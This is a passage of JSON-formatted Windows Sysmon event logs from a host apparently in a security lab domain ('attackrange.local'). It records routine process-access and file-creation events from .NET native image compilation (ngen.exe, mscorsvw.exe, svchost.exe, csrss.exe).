{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6633,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.839\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-001009AB0C00}\r\nTargetProcessId: 3868\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.839","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-001009AB0C00}","TargetProcessId":"3868","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6634,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.855\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-0010D7040C00}\r\nTargetProcessId: 3000\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.855","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-0010D7040C00}","TargetProcessId":"3000","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6635,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.855\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0440-5F25-0000-0010D7040C00}\r\nTargetProcessId: 3000\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.855","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0440-5F25-0000-0010D7040C00}","TargetProcessId":"3000","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6636,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:18.870\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047A-5F25-0000-0010FCAD0C00}\r\nTargetProcessId: 3000\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:18.870","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047A-5F25-0000-0010FCAD0C00}","TargetProcessId":"3000","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6637,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:18.995\r\nProcessGuid: {A837DB8D-047A-5F25-0000-0010FCAD0C00}\r\nProcessId: 3000\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bb8-0\\Microsoft.GroupPolicy.ServerAdminTools.GpmgmtLib.dll\r\nCreationUtcTime: 2020-08-01 05:58:18.995","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:18.995","ProcessGuid":"{A837DB8D-047A-5F25-0000-0010FCAD0C00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bb8-0\\Microsoft.GroupPolicy.ServerAdminTools.GpmgmtLib.dll","CreationUtcTime":"2020-08-01 05:58:18.995","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6638,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.011\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-001025B10C00}\r\nTargetProcessId: 3932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.011","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-001025B10C00}","TargetProcessId":"3932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6639,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.011\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-001025B10C00}\r\nTargetProcessId: 3932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.011","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-001025B10C00}","TargetProcessId":"3932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6640,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.011\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-001025B10C00}\r\nTargetProcessId: 3932\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:19.011","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047B-5F25-0000-001025B10C00}","TargetProcessId":"3932","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:19","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6641,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:19.042\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047B-5F25-0000-00101FB40C00}\r\nTargetProcessId: 656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 